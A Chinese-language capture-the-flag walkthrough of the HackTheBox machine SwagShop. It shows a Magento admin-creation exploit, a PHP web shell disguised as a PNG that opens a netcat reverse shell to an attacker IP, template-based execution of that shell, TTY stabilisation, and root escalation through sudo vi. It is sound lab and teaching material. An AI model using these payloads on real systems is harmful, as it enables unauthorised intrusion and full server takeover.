hackthebox-swagshop(考点:magento安全 & vi提权)

1、nmap

打开80,这是个网站,搜一下可以看到登录框。既然有magento的logo。不妨先查下什么是

2、magento渗透

既然是个著名的电商系统,可以搜一下漏洞 有很多,因为py方便,就选择py,且37977.py前面似乎没写版本要求,可能这个更通用些,就试这个

打开看看,做点修改,把网址改成靶机的网址 运行,报错,根据报错提示,我直接把非code部分都删了 再运行,搞定,生成一个管理员账户 用这个账号进去。

接下来是根据这个,来思考如何拿shell,跟着图片步骤来。

总体思路就是 先点击System –> Configuration 再左下角底部Advanced –> Developer :

再Template Settings –> Allow Symlinks :选择yes。 右上角点击save保存

然后Catalog –> Manage Categories :上传图片,图片里面放shell,前面加magic bytes,伪装成图片。 avtive点yes

.PNG....<?php
passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.57 1337 >/tmp/f");
?>

最后在newsletter-newsletter-template里右边add一个新的template。输入这个

{
          
   {
          
   block type=core/template template=../../../../../../media/catalog/category/此处写你上传的文件名}}

点击保存,跳出后再点击进来,右上部点击preview templates

本机开启监听,收到

这种低权限bash要把它升级,更美观,更有效。以免是个不稳定的shell

先python -c import pty; pty.spawn("/bin/bash")
如果提示没python,那可能有Python3,改为:python3 -c import pty; pty.spawn("/bin/bash")
按ctrl+z
断开了,再输入stty raw -echo
继续输入fg
按两次enter
输入export TERM=screen
输入stty rows 34 cols 136

ok这个shell变稳定了,你按ctrl+c他都不会end。

3、提权

老套路,上看看提权信息,通过wget传进来到tmp

发现这个 vi是文本编辑器,/var/www/html/*意思是这个文件路径里的任何文件。总体思路就是可以以root权限编辑这个路径下的文件,如果我在里面编辑个给shell的命令,就可以了

在里面随便找个文件,sudo /usr/bin/vi /var/www/html/php.ini.sample -c :!/bin/bash或者进文件里加上:!/bin/bash

经验分享 程序员 微信小程序 职场和发展